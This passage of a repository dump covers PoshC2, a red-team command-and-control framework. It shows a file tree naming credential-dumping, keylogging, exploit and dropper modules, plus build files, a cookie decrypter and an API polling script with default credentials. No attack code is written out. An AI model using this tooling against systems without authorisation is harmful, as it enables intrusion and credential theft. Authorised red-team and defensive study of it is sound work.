├── .github ├── ISSUE_TEMPLATE │ ├── bug_report.md │ └── feature_request.md └── workflows │ ├── docker-image.yml │ └── docker-publish.yml ├── .gitignore ├── Dockerfile ├── Install-for-Docker.sh ├── Install.sh ├── LICENSE ├── Pipfile ├── README.md ├── cookie_decrypter.py ├── poll.py ├── poshc2-ansible-main.yml ├── poshc2 ├── Utils.py ├── __init__.py ├── client │ ├── Alias.py │ ├── Opsec.py │ ├── __init__.py │ ├── cli │ │ ├── AutosuggestionAggregator.py │ │ ├── CommandPromptCompleter.py │ │ ├── PoshExamplesAutosuggestions.py │ │ └── __init__.py │ ├── command_handlers │ │ ├── CommandTags.py │ │ ├── CommonCommands.py │ │ ├── FCommHandler.py │ │ ├── ImplantHandler.py │ │ ├── JxaHandler.py │ │ ├── LinuxHandler.py │ │ ├── PBindHandler.py │ │ ├── PSHandler.py │ │ ├── PyHandler.py │ │ ├── SharpHandler.py │ │ ├── UnmanagedWindowsHandler.py │ │ └── __init__.py │ └── reporting │ │ ├── CSV.py │ │ ├── HTML.py │ │ ├── ReportColumns.py │ │ ├── ReportKeys.py │ │ └── __init__.py └── server │ ├── AutoLoads.py │ ├── C2Server.py │ ├── Cert.py │ ├── Config.py │ ├── Core.py │ ├── ImplantExtensions.py │ ├── ImplantType.py │ ├── Pipelines.py │ ├── PowerStatus.py │ ├── Tasks.py │ ├── UrlConfig.py │ ├── __init__.py │ ├── database │ ├── Helpers.py │ ├── Model.py │ └── __init__.py │ └── payloads │ ├── JS-Payloads.py │ ├── Linux.py │ ├── Macro-Payloads.py │ ├── Payloads.py │ ├── XOR-Payloads.py │ └── __init__.py ├── resources ├── SharpSocks │ └── SharpSocksServer.zip ├── beacon-data │ ├── cat.png │ ├── d.png │ ├── dog.png │ ├── fb.jpg │ ├── fg.png │ ├── i.png │ ├── in.png │ ├── paw.png │ ├── pn.png │ └── we.gif ├── config-template.yml ├── html-templates │ ├── autoruns.html │ ├── c2view.html │ ├── components │ │ ├── autocomplete.html │ │ ├── c2_message_logs.html │ │ ├── commands_form.html │ │ ├── implant_tasks.html │ │ └── implants_table.html │ ├── files.html │ ├── header.html │ ├── home.html │ ├── include │ │ ├── css │ │ │ ├── bootstrap-icons.min.css │ │ │ ├── bootstrap.min.css │ │ │ └── fonts │ │ │ │ ├── bootstrap-icons.woff │ │ │ │ └── bootstrap-icons.woff2 │ │ ├── img │ │ │ ├── logo-for-dark.webp │ │ │ └── logo-for-light.webp │ │ └── js │ │ │ └── jquery.min.js │ ├── payloads.html │ ├── reports.html │ └── tasksview.html ├── images │ ├── PoshC2Logo.png │ ├── ReportLogo.png │ ├── firewall.png │ └── implant.png ├── mitre-mapping.yml ├── modules │ ├── Brute-AD.ps1 │ ├── Brute-LocAdmin.ps1 │ ├── Bypass-UAC.ps1 │ ├── CSharp-OracleClient.exe │ ├── CVE-2016-9192.ps1 │ ├── Certify.exe │ ├── ConvertTo-Shellcode.ps1 │ ├── Cred-Popper.ps1 │ ├── DNSResolve.exe │ ├── Daisy.dll │ ├── Decrypt-RDCMan.ps1 │ ├── Dump-NTDS.ps1 │ ├── Echo.exe │ ├── EventLogSearcher.exe │ ├── Exploit-EternalBlue.ps1 │ ├── FComm.exe │ ├── FileGrep.exe │ ├── Get-ComputerInfo.ps1 │ ├── Get-CreditCardData.ps1 │ ├── Get-FirewallRules.ps1 │ ├── Get-GPPAutologon.ps1 │ ├── Get-GPPPassword.ps1 │ ├── Get-Hash.ps1 │ ├── Get-IPConfig.ps1 │ ├── Get-IdleTime.ps1 │ ├── Get-InjectedThread.ps1 │ ├── Get-InjectedThreads.ps1 │ ├── Get-Keystrokes.ps1 │ ├── Get-LAPSPasswords.ps1 │ ├── Get-LocAdm.ps1 │ ├── Get-MSHotFixes.ps1 │ ├── Get-Netstat.ps1 │ ├── Get-PassNotExp.ps1 │ ├── Get-PassPol.ps1 │ ├── Get-ProcessList.ps1 │ ├── Get-RecentFiles.ps1 │ ├── Get-ServicePerms.ps1 │ ├── Get-System.ps1 │ ├── Get-TokenElevationType.ps1 │ ├── Get-UserInfo.ps1 │ ├── Get-UserLogons.ps1 │ ├── Get-WLANPass.ps1 │ ├── GetCreds.exe │ ├── GetInstallerInfo.exe │ ├── HealthInspector.js │ ├── HostEnum.ps1 │ ├── IPConfigCS.exe │ ├── IncidentReponseToolkit.ps1 │ ├── IncidentResponseToolkit.exe │ ├── Inject-Shellcode.ps1 │ ├── InternalMonologue.exe │ ├── Inveigh-Relay.ps1 │ ├── Inveigh.exe │ ├── Inveigh.ps1 │ ├── Invoke-Arpscan.ps1 │ ├── Invoke-DCSync.ps1 │ ├── Invoke-DaisyChain.ps1 │ ├── Invoke-EDRChecker.ps1 │ ├── Invoke-EventVwrBypass.ps1 │ ├── Invoke-Hostscan.ps1 │ ├── Invoke-InveighUnprivileged.ps1 │ ├── Invoke-Kerberoast.ps1 │ ├── Invoke-MS16-032-Proxy.ps1 │ ├── Invoke-MS16-032.ps1 │ ├── Invoke-Mimikatz.ps1 │ ├── Invoke-PSInject.ps1 │ ├── Invoke-Pbind.ps1 │ ├── Invoke-Pipekat.ps1 │ ├── Invoke-Portscan.ps1 │ ├── Invoke-PowerDump.ps1 │ ├── Invoke-PsExec.ps1 │ ├── Invoke-PsUACme.ps1 │ ├── Invoke-ReflectivePEInjection.ps1 │ ├── Invoke-ReverseDnsLookup.ps1 │ ├── Invoke-RunAs.ps1 │ ├── Invoke-SMBClient.ps1 │ ├── Invoke-SMBExec.ps1 │ ├── Invoke-Sharp.ps1 │ ├── Invoke-Shellcode.ps1 │ ├── Invoke-Sniffer.ps1 │ ├── Invoke-SqlQuery.ps1 │ ├── Invoke-Tater.ps1 │ ├── Invoke-TheHash.ps1 │ ├── Invoke-TokenManipulation.ps1 │ ├── Invoke-URLCheck.ps1 │ ├── Invoke-WMIChecker.ps1 │ ├── Invoke-WMICommand.ps1 │ ├── Invoke-WMIEvent.ps1 │ ├── Invoke-WMIExec.ps1 │ ├── Invoke-WScriptBypassUAC.ps1 │ ├── Invoke-WinRMSession.ps1 │ ├── KeePassConfig.ps1 │ ├── KeeThief.ps1 │ ├── LockLess.exe │ ├── LoggedOnUsers.exe │ ├── Logger.exe │ ├── MiniDump.ps1 │ ├── NamedPipe.ps1 │ ├── NamedPipeDaisy.ps1 │ ├── NamedPipeProxy.ps1 │ ├── Net-GPPPassword.exe │ ├── New-JScriptShell.ps1 │ ├── OFs │ │ ├── adcs_enum.x64.o │ │ ├── adcs_enum.x86.o │ │ ├── adcs_enum_com.x64.o │ │ ├── adcs_enum_com.x86.o │ │ ├── adcs_enum_com2.x64.o │ │ ├── adcs_enum_com2.x86.o │ │ ├── adv_audit_policies.x64.o │ │ ├── adv_audit_policies.x86.o │ │ ├── arp.x64.o │ │ ├── arp.x86.o │ │ ├── cacls.x64.o │ │ ├── cacls.x86.o │ │ ├── demo_bof.x64.o │ │ ├── demo_bof.x86.o │ │ ├── dir.x64.o │ │ ├── dir.x86.o │ │ ├── driversigs.x64.o │ │ ├── driversigs.x86.o │ │ ├── enum_filter_driver.x64.o │ │ ├── enum_filter_driver.x86.o │ │ ├── enumlocalsessions.x64.o │ │ ├── enumlocalsessions.x86.o │ │ ├── env.x64.o │ │ ├── env.x86.o │ │ ├── findLoadedModule.x64.o │ │ ├── findLoadedModule.x86.o │ │ ├── get-netsession.x64.o │ │ ├── get-netsession.x86.o │ │ ├── get_password_policy.x64.o │ │ ├── get_password_policy.x86.o │ │ ├── inlineExecute-Assemblyx64.o │ │ ├── ipconfig.x64.o │ │ ├── ipconfig.x86.o │ │ ├── ldapsearch.x64.o │ │ ├── ldapsearch.x86.o │ │ ├── listdns.x64.o │ │ ├── listdns.x86.o │ │ ├── listmods.x64.o │ │ ├── listmods.x86.o │ │ ├── locale.x64.o │ │ ├── locale.x86.o │ │ ├── netgroup.x64.o │ │ ├── netgroup.x86.o │ │ ├── netlocalgroup.x64.o │ │ ├── netlocalgroup.x86.o │ │ ├── netshares.x64.o │ │ ├── netshares.x86.o │ │ ├── netstat.x64.o │ │ ├── netstat.x86.o │ │ ├── netuse.x64.o │ │ ├── netuse.x86.o │ │ ├── netuser.x64.o │ │ ├── netuser.x86.o │ │ ├── netuserenum.x64.o │ │ ├── netuserenum.x86.o │ │ ├── netview.x64.o │ │ ├── netview.x86.o │ │ ├── nonpagedldapsearch.x64.o │ │ ├── nonpagedldapsearch.x86.o │ │ ├── notepad.x64.o │ │ ├── notepad.x86.o │ │ ├── nslookup.x64.o │ │ ├── nslookup.x86.o │ │ ├── probe.x64.o │ │ ├── probe.x86.o │ │ ├── reg_query.x64.o │ │ ├── reg_query.x86.o │ │ ├── resources.x64.o │ │ ├── resources.x86.o │ │ ├── routeprint.x64.o │ │ ├── routeprint.x86.o │ │ ├── sc_enum.x64.o │ │ ├── sc_enum.x86.o │ │ ├── sc_qc.x64.o │ │ ├── sc_qc.x86.o │ │ ├── sc_qdescription.x64.o │ │ ├── sc_qdescription.x86.o │ │ ├── sc_qfailure.x64.o │ │ ├── sc_qfailure.x86.o │ │ ├── sc_qtriggerinfo.x64.o │ │ ├── sc_qtriggerinfo.x86.o │ │ ├── sc_query.x64.o │ │ ├── sc_query.x86.o │ │ ├── schtasksenum.x64.o │ │ ├── schtasksenum.x86.o │ │ ├── schtasksquery.x64.o │ │ ├── schtasksquery.x86.o │ │ ├── tasklist.x64.o │ │ ├── tasklist.x86.o │ │ ├── uptime.x64.o │ │ ├── uptime.x86.o │ │ ├── vssenum.x64.o │ │ ├── vssenum.x86.o │ │ ├── whoami.x64.o │ │ ├── whoami.x86.o │ │ ├── windowlist.x64.o │ │ ├── windowlist.x86.o │ │ ├── wmi_query.x64.o │ │ └── wmi_query.x86.o │ ├── Orchard.js │ ├── Out-Minidump.ps1 │ ├── PBind.exe │ ├── PEs │ │ ├── ATPMiniDump.exe │ │ ├── JuicyPotato.exe │ │ ├── MS-RPRN.exe │ │ ├── NetMan-Dll.exe │ │ ├── SpoolSample.exe │ │ ├── UACME.txt │ │ ├── mimikatz.exe │ │ └── net.exe │ ├── PGrabber.dll │ ├── PS.exe │ ├── PassTheCert.exe │ ├── PingCS.exe │ ├── PortScanner.dll │ ├── PortScanner.ps1 │ ├── PowerUp.ps1 │ ├── PowerUpSQL.ps1 │ ├── PowerUpSQL_Full.ps1 │ ├── PowerView_dev.ps1 │ ├── Powermad.ps1 │ ├── PrivescCheck.ps1 │ ├── PwrStatusTracker.dll │ ├── RegSave.exe │ ├── Rubeus.exe │ ├── RunAs-NetOnly.ps1 │ ├── RunAs.exe │ ├── RunOF-Debug.exe │ ├── RunOF.exe │ ├── RunPE-Debug.exe │ ├── RunPE.exe │ ├── RunasCs.exe │ ├── SExec.exe │ ├── SQLQuery.exe │ ├── SSLInspectionCheck.ps1 │ ├── SafetyDump.exe │ ├── SafetyKatz.exe │ ├── SchTasks.exe │ ├── Screenshot-AllWindows.ps1 │ ├── Screenshot.dll │ ├── Screenshot.ps1 │ ├── Seatbelt.exe │ ├── Seatbelt.ps1 │ ├── Service-Perms.ps1 │ ├── Set-LHSTokenPrivilege.ps1 │ ├── SharPersist.exe │ ├── SharpApplocker.exe │ ├── SharpCOM.exe │ ├── SharpChrome.exe │ ├── SharpChromium.exe │ ├── SharpCookieMonster.exe │ ├── SharpCreateProc.exe │ ├── SharpDPAPI.exe │ ├── SharpDump.exe │ ├── SharpEDRChecker.exe │ ├── SharpEdge.exe │ ├── SharpFTP.exe │ ├── SharpHound.exe │ ├── SharpHound.ps1 │ ├── SharpLogger.exe │ ├── SharpPrintNightmare.exe │ ├── SharpPrinter.exe │ ├── SharpProcessList.exe │ ├── SharpReg.exe │ ├── SharpRoast.exe │ ├── SharpSC.exe │ ├── SharpSC2.exe │ ├── SharpSSDP.exe │ ├── SharpService.exe │ ├── SharpShadowCopy.exe │ ├── SharpShares.exe │ ├── SharpSniper.exe │ ├── SharpSocksImplant.exe │ ├── SharpSploit.dll │ ├── SharpTask.exe │ ├── SharpTelnet.exe │ ├── SharpUp.exe │ ├── SharpView.exe │ ├── SharpWMI.exe │ ├── SharpWSUS.exe │ ├── SharpWeb.exe │ ├── Sherlock.ps1 │ ├── Shhmon.exe │ ├── Sitrep.exe │ ├── Stage2-Core.exe │ ├── Stage2-Core.ps1 │ ├── StandIn.exe │ ├── Steal_token.exe │ ├── StickyNotesExtract.exe │ ├── SweetPotato.exe │ ├── SwiftBelt.js │ ├── SyscallsExtractor.exe │ ├── Test-ADCredential.ps1 │ ├── TestProxy.ps1 │ ├── Unhooker.ps1 │ ├── WExec.exe │ ├── Watson.exe │ ├── Zippy.ps1 │ ├── clipboard.exe │ ├── clipboard_monitor.js │ ├── cred-popper.js │ ├── dcom.exe │ ├── linuxprivchecker.py │ ├── powercat.ps1 │ ├── powerview.ps1 │ └── token.exe ├── payload-templates │ ├── DotNet2JS.js │ ├── DynamicCode.cs │ ├── Implant-Core.js │ ├── Implant-Core.ps1 │ ├── Implant-Core.py │ ├── Sharp_Powershell_Runner.cs │ ├── Sharp_v2_x64_Shellcode.b64 │ ├── Sharp_v2_x64_dll.b64 │ ├── Sharp_v2_x86_Shellcode.b64 │ ├── Sharp_v2_x86_dll.b64 │ ├── Sharp_v4_x64_Shellcode.b64 │ ├── Sharp_v4_x64_dll.b64 │ ├── Sharp_v4_x86_Shellcode.b64 │ ├── Sharp_v4_x86_dll.b64 │ ├── System.Management.Automation.dll │ ├── Unmanaged_x64_Shellcode.b64 │ ├── Unmanaged_x86_Shellcode.b64 │ ├── aes.py │ ├── csc.cs │ ├── dropper │ ├── dropper.c │ ├── dropper.cs │ ├── dropper.hta │ ├── dropper.js │ ├── dropper.macro │ ├── dropper.ps1 │ ├── dropper.py │ ├── dropper.xor │ ├── dropper_cs.sct │ ├── dropper_jxa.js │ ├── dropper_migrate.c │ ├── dropper_rg.sct │ ├── fcomm.cs │ ├── msbuild.xml │ ├── pbind.cs │ ├── pbind.ps1 │ ├── sharp-dropper │ │ ├── AssemblyLoading.cs │ │ ├── Comms.cs │ │ ├── Config.cs │ │ ├── ERROR_CODES.txt │ │ ├── Encryption.cs │ │ ├── FileComms.cs │ │ ├── HttpComms.cs │ │ ├── Internals.cs │ │ ├── NamedPipeComms.cs │ │ ├── Program.cs │ │ ├── Properties │ │ │ └── AssemblyInfo.cs │ │ ├── README.md │ │ ├── Utils.cs │ │ ├── sharp_dropper.csproj │ │ └── sharp_dropper.sln │ └── stage2core.so ├── reporting │ └── HTML_Template.html ├── responses │ ├── 200_response1.html │ ├── 200_response2.html │ ├── 200_response3.html │ ├── 200_response4.html │ ├── 200_response5.html │ ├── 200_response6.html │ └── 404_response.html ├── scripts │ ├── PoshC2.psm1 │ ├── _posh-common │ ├── fpc │ ├── fpc.py │ ├── posh │ ├── posh-api-server │ ├── posh-config │ ├── posh-cookie-decrypter │ ├── posh-docker │ ├── posh-docker-build │ ├── posh-docker-clean │ ├── posh-docker-debug │ ├── posh-docker-server │ ├── posh-docker-stop-server │ ├── posh-log │ ├── posh-project │ ├── posh-server │ ├── posh-service │ ├── posh-service-ansible │ ├── posh-stop-service │ ├── posh-update │ ├── poshc2.api.service │ └── poshc2.service ├── urls.txt └── wordlist.txt ├── start.py ├── start_api.py └── tests ├── __init__.py └── test_utils.py /.github/ISSUE_TEMPLATE/bug_report.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Bug report 3 | about: Create a report to help us improve 4 | title: "[BUG]" 5 | labels: bug 6 | assignees: '' 7 | 8 | --- 9 | 10 | ## Description 11 | 12 | A clear and concise description of what the bug is. 13 | 14 | ## Execution Environment: 15 | **All of this must be filled in** 16 | Data | Value 17 | ------ | ------ 18 | Full Posh version (all the text between the === at the top of the Implant Handler) | 19 | OS & version | 20 | Using Docker/containerisation? | 21 | 22 | ## Implant Info 23 | * What implant does the problem occur on? PowerShell/C#/Python 24 | * How was the implant created? Running a default payload? Inject-shellcode? Custom payload? 25 | 26 | ## Defensive Technologies 27 | * Is the target environment running any particular defensive products? AVs/EDRs etc? 28 | 29 | ## To Reproduce 30 | Steps to reproduce the behavior: 31 | 1. Go to '...' 32 | 2. Click on '....' 33 | 3. Scroll down to '....' 34 | 4. See error 35 | 36 | ## Expected behavior 37 | A clear and concise description of what you expected to happen. 38 | 39 | ## Screenshots 40 | If applicable, add screenshots to help explain your problem. 41 | 42 | ## Attach files if required 43 | 44 | ## Additional context 45 | 46 | Add any other context about the problem here. 47 | -------------------------------------------------------------------------------- /.github/ISSUE_TEMPLATE/feature_request.md: -------------------------------------------------------------------------------- 1 | --- 2 | name: Feature request 3 | about: Suggest an idea for this project 4 | title: "[FEATURE]" 5 | labels: enhancement 6 | assignees: '' 7 | 8 | --- 9 | 10 | ## Is your feature request related to a problem? Please describe. 11 | 12 | A clear and concise description of what the problem is. Ex. I'm always frustrated when [...] 13 | 14 | ## Describe the solution you'd like 15 | A clear and concise description of what you want to happen. 16 | 17 | ## Describe alternatives you've considered 18 | A clear and concise description of any alternative solutions or features you've considered. 19 | 20 | ## Additional context 21 | Add any other context, files or screenshots about the feature request here. 22 | -------------------------------------------------------------------------------- /.github/workflows/docker-image.yml: -------------------------------------------------------------------------------- 1 | name: Docker Image CI 2 | 3 | on: 4 | push: 5 | 6 | # Publish `master` as Docker `latest` image. 7 | branches: 8 | - master 9 | - dev 10 | 11 | # Publish `v1.2.3` tags as releases. 12 | tags: 13 | - v* 14 | 15 | jobs: 16 | 17 | push_to_registry: 18 | 19 | name: Push Docker image to Docker Hub 20 | runs-on: ubuntu-latest 21 | 22 | steps: 23 | - name: Check out the repo 24 | uses: actions/checkout@v2 25 | - name: Push to Docker Hub 26 | uses: docker/build-push-action@v1 27 | with: 28 | username: ${{ secrets.DOCKER_USERNAME }} 29 | password: ${{ secrets.DOCKER_PASSWORD }} 30 | repository: m0rv4i/poshc2 31 | tag_with_ref: true 32 | -------------------------------------------------------------------------------- /.github/workflows/docker-publish.yml: -------------------------------------------------------------------------------- 1 | name: Docker 2 | 3 | on: 4 | push: 5 | 6 | # Publish `master` as Docker `latest` image. 7 | branches: 8 | - master 9 | 10 | # Publish `v1.2.3` tags as releases. 11 | tags: 12 | - v* 13 | 14 | env: 15 | # TODO: Change variable to your image's name. 16 | IMAGE_NAME: poshc2 17 | 18 | jobs: 19 | push: 20 | 21 | runs-on: ubuntu-latest 22 | if: github.event_name == 'push' 23 | 24 | steps: 25 | - uses: actions/checkout@v2 26 | 27 | - name: Build image 28 | run: docker build . --file Dockerfile --tag $IMAGE_NAME 29 | 30 | - name: Log into registry 31 | run: echo "${{ secrets.GITHUB_TOKEN }}" | docker login docker.pkg.github.com -u ${{ github.actor }} --password-stdin 32 | 33 | - name: Push image 34 | run: | 35 | IMAGE_ID=docker.pkg.github.com/${{ github.repository }}/$IMAGE_NAME 36 | 37 | # Change all uppercase to lowercase 38 | IMAGE_ID=$(echo $IMAGE_ID | tr '[A-Z]' '[a-z]') 39 | 40 | # Strip git ref prefix from version 41 | VERSION=$(echo "${{ github.ref }}" | sed -e 's,.*/\(.*\),\1,') 42 | 43 | # Strip "v" prefix from tag name 44 | [[ "${{ github.ref }}" == "refs/tags/"* ]] && VERSION=$(echo $VERSION | sed -e 's/^v//') 45 | 46 | # Use Docker `latest` tag convention 47 | [ "$VERSION" == "master" ] && VERSION=latest 48 | 49 | echo IMAGE_ID=$IMAGE_ID 50 | echo VERSION=$VERSION 51 | 52 | docker tag $IMAGE_NAME $IMAGE_ID:$VERSION 53 | docker push $IMAGE_ID:$VERSION 54 | -------------------------------------------------------------------------------- /.gitignore: -------------------------------------------------------------------------------- 1 | # Byte-compiled / optimized / DLL files 2 | __pycache__/ 3 | *.py[cod] 4 | *$py.class 5 | *.pyc 6 | # C extensions 7 | *.so 8 | 9 | # Distribution / packaging 10 | .Python 11 | env/ 12 | build/ 13 | develop-eggs/ 14 | dist/ 15 | downloads/ 16 | eggs/ 17 | .eggs/ 18 | lib/ 19 | lib64/ 20 | parts/ 21 | sdist/ 22 | var/ 23 | *.egg-info/ 24 | .installed.cfg 25 | *.egg 26 | 27 | # Backup files 28 | *.bak 29 | 30 | # PyInstaller 31 | # Usually these files are written by a python script from a template 32 | # before PyInstaller builds the exe, so as to inject date/other infos into it. 33 | *.manifest 34 | *.spec 35 | 36 | # Installer logs 37 | pip-log.txt 38 | pip-delete-this-directory.txt 39 | 40 | # Unit test / coverage reports 41 | htmlcov/ 42 | .tox/ 43 | .coverage 44 | .coverage.* 45 | .cache 46 | nosetests.xml 47 | coverage.xml 48 | *,cover 49 | .hypothesis/ 50 | 51 | # Translations 52 | *.mo 53 | *.pot 54 | 55 | # Django stuff: 56 | *.log 57 | local_settings.py 58 | 59 | # Flask stuff: 60 | instance/ 61 | .webassets-cache 62 | 63 | # Scrapy stuff: 64 | .scrapy 65 | 66 | # Sphinx documentation 67 | docs/_build/ 68 | 69 | # PyBuilder 70 | target/ 71 | 72 | # IPython Notebook 73 | .ipynb_checkpoints 74 | 75 | # pyenv 76 | .python-version 77 | 78 | # celery beat schedule file 79 | celerybeat-schedule 80 | 81 | # dotenv 82 | .env 83 | 84 | # virtualenv 85 | venv/ 86 | ENV/ 87 | 88 | # vim backup 89 | *.swp 90 | 91 | # Spyder project settings 92 | .spyderproject 93 | 94 | # Rope project settings 95 | .ropeproject 96 | 97 | # VSCode 98 | .vscode/ 99 | 100 | # VStudio 101 | .vs/ 102 | 103 | .pytest_cache/ 104 | Pipfile.lock 105 | resources/modules/*.txt 106 | 107 | *.DotSettings.user 108 | resources/SharpSocks/SharpSocksServer/ 109 | -------------------------------------------------------------------------------- /Dockerfile: -------------------------------------------------------------------------------- 1 | # From the Kali Linux base image 2 | FROM kalilinux/kali-rolling 3 | 4 | # Install PoshC2 5 | ADD . /opt/PoshC2 6 | RUN /opt/PoshC2/Install.sh 7 | ADD . /opt/PoshC2 8 | 9 | # Working directory 10 | WORKDIR /opt/PoshC2 11 | -------------------------------------------------------------------------------- /LICENSE: -------------------------------------------------------------------------------- 1 | BSD 3-Clause License 2 | 3 | Copyright (c) 2020, Nettitude 4 | 5 | All rights reserved. 6 | 7 | Redistribution and use in source and binary forms, with or without 8 | modification, are permitted provided that the following conditions are met: 9 | 10 | * Redistributions of source code must retain the above copyright notice, this 11 | list of conditions and the following disclaimer. 12 | 13 | * Redistributions in binary form must reproduce the above copyright notice, 14 | this list of conditions and the following disclaimer in the documentation 15 | and/or other materials provided with the distribution. 16 | 17 | * Neither the name of the copyright holder nor the names of its 18 | contributors may be used to endorse or promote products derived from 19 | this software without specific prior written permission. 20 | 21 | THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" 22 | AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE 23 | IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE 24 | DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE 25 | FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL 26 | DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR 27 | SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER 28 | CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, 29 | OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE 30 | OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE. -------------------------------------------------------------------------------- /Pipfile: -------------------------------------------------------------------------------- 1 | [[source]] 2 | name = "pypi" 3 | url = "https://pypi.org/simple" 4 | verify_ssl = true 5 | 6 | [dev-packages] 7 | pytest = "*" 8 | pycodestyle = "*" 9 | autopep8 = "*" 10 | pylint = "*" 11 | rope = "*" 12 | 13 | [packages] 14 | pandas = "*" 15 | prompt-toolkit = "*" 16 | pycryptodome = "*" 17 | psycopg2-binary = "*" 18 | pyOpenSSL = "*" 19 | PyYAML = "*" 20 | IPy = "*" 21 | pefile = "*" 22 | python-jenkins = "*" 23 | tzlocal = "*" 24 | jenkins = "*" 25 | rich = "*" 26 | SQLAlchemy = "==1.4.41" 27 | numpy = "*" 28 | wheel = "*" 29 | setuptools = "*" 30 | typing_extensions = "*" 31 | flask = "*" 32 | flask-httpauth = "*" 33 | flask-restx = "*" 34 | werkzeug = "*" -------------------------------------------------------------------------------- /cookie_decrypter.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/env python3 2 | 3 | import re 4 | import sys 5 | 6 | from poshc2 import Colours 7 | from poshc2.server.Core import decrypt 8 | from poshc2.server.database.Helpers import select_first 9 | from poshc2.server.database.Model import C2Server 10 | 11 | 12 | def decrypt_and_print(key, encrypted): 13 | try: 14 | decrypted = decrypt(key, encrypted) 15 | print(f"{Colours.GREEN}[+] Success with key {key}\n\t{decrypted}") 16 | sys.exit(0) 17 | except Exception: 18 | print(f"{Colours.RED}[-] Failed decrypt with key: {key}{Colours.END}") 19 | 20 | 21 | def main(): 22 | if len(sys.argv) != 2: 23 | print("Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py ") 24 | print("Usage: From pipenv shell in PoshC2 directory -> python3 cookie-decrypter.py ") 25 | sys.exit(0) 26 | 27 | key = select_first(C2Server.encryption_key) 28 | 29 | if not key: 30 | print(f"{Colours.RED}[-] Could not get key from database{Colours.END}") 31 | sys.exit(1) 32 | 33 | arg = sys.argv[1] 34 | 35 | try: 36 | log_file = open(arg, "r") 37 | print(f"[*] Checking file {arg}") 38 | 39 | for line in log_file: 40 | if re.search("SessionID", line): 41 | encrypted = line.split("SessionID=")[1] 42 | decrypt_and_print(key, encrypted) 43 | 44 | print(f"{Colours.RED}[-] Failed to find and decrypt cookie{Colours.END}") 45 | except Exception: 46 | print(f"[*] Decrypting cookie value {arg}") 47 | decrypt_and_print(key, arg) 48 | print(f"{Colours.RED}[-] Failed to decrypt cookie value{Colours.END}") 49 | 50 | 51 | if __name__ == "__main__": 52 | main() 53 | -------------------------------------------------------------------------------- /poll.py: -------------------------------------------------------------------------------- 1 | import requests 2 | import time 3 | 4 | # Configuration 5 | BASE_URL = "http://localhost:5000" 6 | USERNAME = "poshc2" 7 | PASSWORD = "change_on_install" 8 | FILTER_USERNAME = "bt" # The username to filter tasks by 9 | TASKS_ENDPOINT = f"{BASE_URL}/tasks" 10 | TASK_ENDPOINT = f"{BASE_URL}/task" 11 | POLL_INTERVAL = 5 # Poll every 5 seconds when no task is found 12 | 13 | 14 | def get_latest_task_id(): 15 | """Get the latest task ID from the tasks API.""" 16 | response = requests.get(f"{TASKS_ENDPOINT}/1", auth=(USERNAME, PASSWORD)) 17 | if response.status_code == 200: 18 | tasks = response.json() 19 | if isinstance(tasks, list) and tasks: 20 | latest_task = tasks[0] 21 | task_id = latest_task.get("id") 22 | if task_id is not None: 23 | return int(task_id) 24 | return 0 25 | 26 | 27 | def get_task_by_id(task_id): 28 | """Get task details by task ID from the task API.""" 29 | response = requests.get(f"{TASK_ENDPOINT}/{task_id}", auth=(USERNAME, PASSWORD)) 30 | if response.status_code == 200: 31 | try: 32 | task = response.json() 33 | if task and task.get("completed_time") is not None: 34 | return task 35 | except ValueError: 36 | return None 37 | return None 38 | 39 | 40 | def format_task(task, status): 41 | """Format the task details for printing.""" 42 | task_id = f"Task {int(task.get('id', 0)):05d}" # Format task ID as 5-digit 43 | operator = task.get("user", "Unknown") 44 | implant = task.get("implant_numeric_id", "Unknown") 45 | output = task.get("output") 46 | context = task.get("output", "Unknown").splitlines()[0] if task.get("output") else "Unknown Context" 47 | timestamp = task.get("sent_time") if status == "sent" else task.get("completed_time", "Unknown Time") 48 | command = task.get("command", "Unknown Command") 49 | if status == "sent": 50 | return f"{task_id} sent | Operator: {operator} | Implant: {implant} | Context: {context} | {timestamp}\n{command}\n" 51 | elif status == "returned": 52 | return f"{task_id} returned | Operator: {operator} | Implant: {implant} | Context: {context} | {timestamp}\n\n{output}\n" 53 | return "" 54 | 55 | 56 | def poll_new_tasks(latest_task_id): 57 | """Continuously poll for new tasks.""" 58 | while True: 59 | latest_task_id += 1 60 | task = get_task_by_id(latest_task_id) 61 | if task: 62 | # Check if the task belongs to the specified username 63 | task_user = task.get("user") 64 | if task_user == FILTER_USERNAME: 65 | print(format_task(task, "sent")) 66 | if task.get("output"): # If task is completed and has output 67 | print(format_task(task, "returned")) 68 | else: 69 | # No task found, start the timer before retrying 70 | latest_task_id -= 1 # Reset ID if no task found 71 | time.sleep(POLL_INTERVAL) 72 | 73 | 74 | if __name__ == "__main__": 75 | print(f"Fetching latest task ID for user '{FILTER_USERNAME}'...") 76 | latest_task_id = get_latest_task_id() 77 | print(f"Starting polling from task ID: {latest_task_id + 1}") 78 | poll_new_tasks(latest_task_id) 79 | -------------------------------------------------------------------------------- /poshc2/__init__.py: -------------------------------------------------------------------------------- 1 | #! /usr/bin/env python3 2 | 3 | import subprocess 4 | import sys 5 | 6 | try: 7 | VERSION = subprocess.check_output( 8 | ["git", "describe", "--match", "v[0-9]*", "--abbrev=0", "--tags", "HEAD"]).decode().strip() 9 | except subprocess.CalledProcessError: 10 | VERSION = "Zip" 11 | 12 | 13 | class Colours: 14 | BLUE = '\033[94m' 15 | GREEN = '\033[92m' 16 | RED = '\033[91m' 17 | END = '\033[0m' 18 | YELLOW = '\033[93m' 19 | PURPLE = '\033[1;35m' 20 | 21 | 22 | logo = Colours.GREEN + r""" 23 | _________ .__. _________ ________ 24 | \_______ \____ _____| 